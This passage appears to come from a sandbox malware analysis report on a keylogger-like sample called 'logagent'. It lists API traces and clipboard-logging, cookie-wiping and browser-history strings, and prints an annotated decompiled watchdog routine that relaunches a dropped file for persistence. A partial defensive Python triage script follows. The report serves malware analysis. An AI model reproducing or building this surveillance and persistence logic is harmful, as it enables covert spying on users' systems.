                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(000000FA), ref: 00401C24
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                  Strings
                                  • /sort "Visit Time" /stext ", xrefs: 00401B97
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                  • String ID: /sort "Visit Time" /stext "
                                  • API String ID: 1247708949-1573945896
                                  • Opcode ID: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                  • Opcode Fuzzy Hash: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateDCA.GDI32(00416A4C,00000000,00000000,00000000), ref: 105513EB
                                  • CreateCompatibleDC.GDI32(00000000), ref: 105513F7
                                    • Part of subcall function 1055185D: GetMonitorInfoW.USER32(?,?), ref: 1055187D
                                    • Part of subcall function 105518A7: GetMonitorInfoW.USER32(?,?), ref: 105518C7
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 1055143B
                                  • DeleteObject.GDI32(00000000), ref: 10551457
                                  • SelectObject.GDI32(?,00000000), ref: 10551469
                                  • DeleteObject.GDI32(?), ref: 10551484
                                  • GlobalFree.KERNEL32(?), ref: 10551759
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateObject$CompatibleDeleteInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM
                                  • API String ID: 472775371-1947242164
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: fee22f74d9fa04e84cf6f9cc9b495b9ae881ea934d950e169d8773cc09b52954
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 6BC1F67590020EEFCF119FA0DC889DEBFB9FF48354F10842AE905A6160DB31AA59DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,746B73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [End of clipboard text], xrefs: 004069EC
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  • [Ctrl + , xrefs: 00406996
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: f055b0a47fed377ab138603d79dccd8f7202f2c89e84a5b9c4b01e99b008c5f4
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: f055b0a47fed377ab138603d79dccd8f7202f2c89e84a5b9c4b01e99b008c5f4
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                   Uniqueness
                                   • Uniqueness Score: -1.00%

                                   C-Code - Quality: 35%
                                   			// Watchdog loop recovered from the module mapped at 0x10540000. Helper names
                                   			// (E1054xxxx) are the decompiler's; the comments annotate the Win32 constants
                                   			// and what the APIs list below shows each helper to wrap. _a4 is the PID of
                                   			// the process this routine guards.
                                   			E1054C295(void* __eflags, long _a4) {
                                   				char _v5;
                                   				void* _v12;
                                   				char _v28;
                                   				void _v530;
                                   				signed short _v532;
                                   				short _v548;
                                   				short _v1068;
                                   				short _v1588;
                                   				short _v2108;
                                   				void* _t39;
                                   				void* _t40;
                                   				void* _t43;
                                   				void* _t49;
                                   				long _t52;
                                   				void* _t54;
                                   				char _t55;
                                   				void* _t57;
                                   				void* _t58;
                                   				void* _t59;
                                   				void* _t61;
                                   				void* _t71;
                                   				void* _t72;
                                   				char _t75;
                                   				char _t76;
                                   				void* _t77;
                                   				char _t86;
                                   				void* _t90;
                                   				void* _t92;
                                   				void* _t103;
                                   				char _t105;
                                   				intOrPtr* _t108;
                                   				void* _t141;
                                   				void* _t151;
                                   				void* _t153;
                                   				void* _t154;
                                   				void* _t155;
                                   				void* _t156;
                                   
                                   				_t141 = 0;
                                   				CreateMutexA(0, 1,  *0x41b15c);                  // single-instance mutex, name taken from the config block
                                   				GetModuleFileNameW(0,  &_v2108, 0x104);         // 0x104 = MAX_PATH
                                   				_t39 =  *0x4152ec();
                                   				_t40 =  *0x415344();
                                   				// E1054D021 wraps RegOpenKeyExA / RegQueryValueExA / RegCloseKey (see APIs below);
                                   				// 0x80000001 = HKEY_CURRENT_USER. The stored path is copied into _v548 (0x208 bytes).
                                   				_t43 = E1054D021(0x80000001,  *0x415344(), 0x4163e0,  &_v548, 0x208, _t40, _t39);
                                   				_t154 = _t153 + 0x1c;
                                   				if(_t43 == 0) {
                                   					exit(0);                                      // no stored path in the registry: nothing to guard
                                   				}
                                   				 *0x41534c( &_v5);
                                   				// presumably reads the file at _v548 into _v28; the same buffer is written back out below
                                   				if(E1055476E( &_v548,  &_v28) == 0) {
                                   					exit(_t141);
                                   				}
                                   				while(1) {
                                   					// 0x100000 = SYNCHRONIZE: the guarded process is opened only so it can be waited on
                                   					_t49 = OpenProcess(0x100000, _t141, _a4);
                                   					_v12 = _t49;
                                   					WaitForSingleObject(_t49, 0xffffffff);        // INFINITE: returns only when the guarded process exits
                                   					CloseHandle(_v12);
                                   					_t52 = GetCurrentProcessId();
                                   					// store own PID under the HKCU value named "WDH"
                                   					_t54 = E1054D1B8(0x80000001,  *0x415344(), "WDH", _t52);
                                   					_t155 = _t155 + 0x10;
                                   					if(_t54 == 0) {
                                   						break;
                                   					}
                                   					if(PathFileExistsW( &_v548) != 0) {
                                   						L7:
                                   						// relaunch the stored path; 0x41578c is the verb string (not recovered), 1 = SW_SHOWNORMAL
                                   						ShellExecuteW(_t141, 0x41578c,  &_v548, _t141, _t141, 1);
                                   						L10:
                                   						do {
                                   							L11:
                                   							// poll the HKCU value into _a4 (apparently the next PID to guard) every 500 ms
                                   							_t86 = E1054CE57(0x41ba38, 0x80000001,  *0x415344(), 0x416524,  &_a4);
                                   							_t155 = _t155 + 0x10;
                                   							_v5 = _t86;
                                   							_t165 = _t86;
                                   							if(_t86 == 0) {
                                   								Sleep(0x1f4);                         // 500 ms
                                   							} else {
                                   								_push( *0x415344(0x416524));
                                   								_push(0x80000001);
                                   								E1054D2EA(_t165);
                                   								_t155 = _t155 + 0xc;
                                   							}
                                   						} while (_v5 == 0);
                                   						_t141 = 0;
                                   						continue;
                                   					}
                                   					// the stored file is gone: rewrite it (E105546E5 -> CreateFileW(GENERIC_WRITE, CREATE_ALWAYS))
                                   					_t90 =  *0x4152ec();
                                   					_t92 = E105546E5( &_v28,  *0x415344(), _t90,  &_v548, _t141);
                                   					_t155 = _t155 + 0x10;
                                   					if(_t92 == 0) {
                                   						// original location not writable: drop a fresh file under %TEMP% instead
                                   						// (GetTempFileNameW prefix at 0x4168b4 and appended suffix at 0x4168a8 are not recovered)
                                   						memset( &_v1588, 0, 0x82 << 2);
                                   						GetTempPathW(0x104,  &_v1588);
                                   						GetTempFileNameW( &_v1588, 0x4168b4, 0,  &_v1068);
                                   						lstrcatW( &_v1068, 0x4168a8);
                                   						_t103 =  *0x4152ec();
                                   						_t105 = E105546E5( &_v28,  *0x415344(), _t103,  &_v1068, 0);
                                   						_t155 = _t155 + 0x1c;
                                   						__eflags = _t105;
                                   						if(_t105 == 0) {
                                   							goto L11;                             // could not write anywhere: keep polling the registry
                                   						}
                                   						__eflags = 0;
                                   						ShellExecuteW(0, 0x41578c,  &_v1068, 0, 0, 1);   // run the temp copy instead
                                   						goto L10;
                                   					}
                                   					goto L7;
                                   				}
                                   				exit(1);
                                   				// exit() does not return: everything below is a separate routine that the
                                   				// decompiler appended because it follows in memory. It re-reads the same HKCU
                                   				// value every 3 s (Sleep(0xbb8)) for as long as the flag at 0x41bd68 is set.
                                   				_t156 = _t155 - 0x208;
                                   				_t108 =  *0x415208;
                                   				_t55 =  *_t108(0x41ba28, 0x415800, _t141, 0x80000001, 0x41ba38, _t151);
                                   				__eflags = _t55;
                                   				if(_t55 == 0) {
                                   					L21:
                                   					__eflags =  *0x41bd68;
                                   					if( *0x41bd68 == 0) {
                                   						L26:
                                   						__eflags = 0;
                                   						return 0;
                                   					}
                                   					do {
                                   						Sleep(0xbb8);                                 // 3000 ms
                                   						__eflags =  *0x41ba21;
                                   						if(__eflags != 0) {
                                   							E105496E2(0x41ba48,  *0x41ba58,  *0x41bc64,  *0x41ba20,  *0x41532c());
                                   							_t156 = _t156 + 0x10;
                                   						}
                                   						_t57 =  *0x4152ec();
                                   						_t58 =  *0x415344();
                                   						_t59 =  *0x41520c();
                                   						_t61 =  *0x41532c();
                                   						E1054D287(__eflags, 0x80000001,  *0x415344(), 0x4163e0, _t61, _t59 + _t59 + 2, _t58, _t57, 3);
                                   						_t156 = _t156 + 0x20;
                                   						__eflags =  *0x41bd68;
                                   					} while ( *0x41bd68 != 0);
                                   					goto L26;
                                   				}
                                   				_v532 = _v532 & 0x00000000;
                                   				memset( &_v530, 0, 0x81 << 2);
                                   				asm("stosw");
                                   				_t71 =  *0x4152ec();
                                   				_t72 =  *0x415344();
                                   				// same registry value as at function entry, read again into _v532 (0x410 bytes)
                                   				_t75 = E1054D021(0x80000001,  *0x415344(), 0x4163e0,  &_v532, 0x410, _t72, _t71);
                                   				_t156 = _t156 + 0x28;
                                   				__eflags = _t75;
                                   				if(_t75 != 0) {
                                   					 *0x415204( &_v532);
                                   				}
                                   				_t76 =  *_t108(0x41ba28, 0x415800);
                                   				__eflags = _t76;
                                   				if(_t76 == 0) {
                                   					goto L21;
                                   				} else {
                                   					_t77 = 1;
                                   					return _t77;
                                   				}
                                   			}

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 1054C2AC
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1054C2BF
                                    • Part of subcall function 1054D021: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 1054D03B
                                    • Part of subcall function 1054D021: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,80000001,10544BEE,0041BA38), ref: 1054D057
                                    • Part of subcall function 1054D021: RegCloseKey.ADVAPI32(?), ref: 1054D062
                                  • exit.MSVCRT ref: 1054C30E
                                  • exit.MSVCRT ref: 1054C338
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 1054C347
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1054C353
                                  • CloseHandle.KERNEL32(80000001), ref: 1054C35C
                                  • GetCurrentProcessId.KERNEL32 ref: 1054C362
                                  • PathFileExistsW.SHLWAPI(?), ref: 1054C38F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 1054C3F2
                                  • GetTempFileNameW.KERNEL32(?,004168B4,00000000,?), ref: 1054C40D
                                  • lstrcatW.KERNEL32(?,004168A8), ref: 1054C41F
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,?,00000000,00000000,00000001), ref: 1054C461
                                  • Sleep.KERNEL32(000001F4), ref: 1054C4A4
                                  • exit.MSVCRT ref: 1054C4B9
                                  • Sleep.KERNEL32(00000BB8), ref: 1054C588
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$exit$CloseCreateNameOpenPathProcessSleepTemp$CurrentExecuteExistsHandleModuleMutexObjectQueryShellSingleValueWaitlstrcat
                                  • String ID: $eA$WDH
                                  • API String ID: 3869290677-830828062
                                  • Opcode ID: 76753f67ac41234570a61778a4f653f46c84872144a4b4409d4a973c20246337
                                  • Instruction ID: 5b17d46360f1e8800bf288989c3856e4caf793c45c99199ac6d477c4efd4c0bc
                                  • Opcode Fuzzy Hash: 76753f67ac41234570a61778a4f653f46c84872144a4b4409d4a973c20246337
                                  • Instruction Fuzzy Hash: 02918572A00608BBDB415BE0DC4DFEE3F6DEBC9741F108069FA06D7191EB7459858BA8
                                   Uniqueness
                                   • Uniqueness Score: -1.00%
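The two per-function blocks above (the cookie-wiping routine at 004077E7 and the watchdog E1054C295) are easier to triage by the combination of calls they make than by any single API. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" and "String ID" lines in exactly the shape printed on this page and applies three combination rules. The trimmed sample blocks are copied from this report; the rule names and the choice of which logged arguments each rule keys on are this example's own assumptions.

```python
"""Added example (not part of the Joe Sandbox report or of the sample): triage
the 'APIs' / 'String ID' lines of a per-function block in the shape shown on
this page and flag the behaviours the decompiled routines implement. Sample
blocks are trimmed copies of this report; rule names and keyed arguments are
this example's own choices."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:";
# the argument list may be absent ("• exit.MSVCRT ref: 1054C30E").
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s(]+?)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")  # '$'-separated list

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]      # hex / '?' / literal tokens exactly as logged
    ref: int                   # call-site address
    subcall_of: Optional[str]  # callee address when hoisted from a subcall

def parse_block(text: str) -> Tuple[List[Call], List[str]]:
    calls, strings = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in (m.group("args") or "").split(",") if a.strip())
            calls.append(Call(m.group("api"), m.group("mod"), args,
                              int(m.group("ref"), 16), m.group("sub")))
        elif (m := STR_RE.match(line)):
            strings.extend(s for s in m.group("ids").split("$") if s)
    return calls, strings

def hex_arg(call: Call, index: int) -> Optional[int]:
    """Numeric view of one logged argument; '?' and text literals give None."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None

def called(calls: List[Call], api: str, where: Callable[[Call], bool] = lambda c: True) -> bool:
    return any(c.api == api and where(c) for c in calls)

SYNCHRONIZE = 0x00100000    # OpenProcess access: handle usable only for waiting
GENERIC_WRITE = 0x40000000  # CreateFileW dwDesiredAccess
CREATE_ALWAYS = 0x00000002  # CreateFileW dwCreationDisposition

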